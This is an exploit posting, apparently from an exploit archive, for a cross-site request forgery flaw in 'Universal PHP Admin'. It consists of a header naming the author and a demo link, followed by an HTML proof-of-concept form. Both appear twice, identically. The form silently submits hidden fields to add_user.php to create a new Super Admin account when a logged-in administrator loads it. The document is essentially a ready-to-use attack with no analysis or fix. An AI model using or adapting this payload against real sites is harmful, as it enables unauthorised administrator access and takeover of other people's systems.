< ------------------- header data start ------------------- >
#############################################################
# Application Name : Universal PHP Admin
# Vulnerable Type : CSRF
# Demo : https://tik.lat/HNwAz
# Author : Jonturk75
#############################################################
< ------------------- header data end of ------------------- >
<form method="post" action="add_user.php">
<input class="input" name="fname" id="fname" value="firstname" type="hidden">
<input class="input" name="lname" id="lname" value="lastname" type="hidden">
<input class="input" name="username" id="username" value="username" type="hidden">
<input class="input" name="email" id="email" value="[email protected]" type="hidden">
<input class="input" name="password" id="password" value="password" type="hidden">
<input class="input" name="cpassword" id="cpassword" value="password" type="hidden">
<select class="input" name="role" id="role" size="1"><option value="">Select the user’s role</option>
<option value="1" selected>Super Admin</option></select>
<input name="email_user" id="email_user" type="checkbox" checked value="1">
<input name="save" id="submit" class="crtbtn_gr" value="Save" type="submit">
</form>
< -- bug code end of -- >
#############################################################
# Application Name : Universal PHP Admin
# Vulnerable Type : CSRF
# Demo : https://tik.lat/HNwAz
# Author : Jonturk75
#############################################################
< ------------------- header data end of ------------------- >
<form method="post" action="add_user.php">
<input class="input" name="fname" id="fname" value="firstname" type="hidden">
<input class="input" name="lname" id="lname" value="lastname" type="hidden">
<input class="input" name="username" id="username" value="username" type="hidden">
<input class="input" name="email" id="email" value="[email protected]" type="hidden">
<input class="input" name="password" id="password" value="password" type="hidden">
<input class="input" name="cpassword" id="cpassword" value="password" type="hidden">
<select class="input" name="role" id="role" size="1"><option value="">Select the user’s role</option>
<option value="1" selected>Super Admin</option></select>
<input name="email_user" id="email_user" type="checkbox" checked value="1">
<input name="save" id="submit" class="crtbtn_gr" value="Save" type="submit">
</form>
< -- bug code end of -- >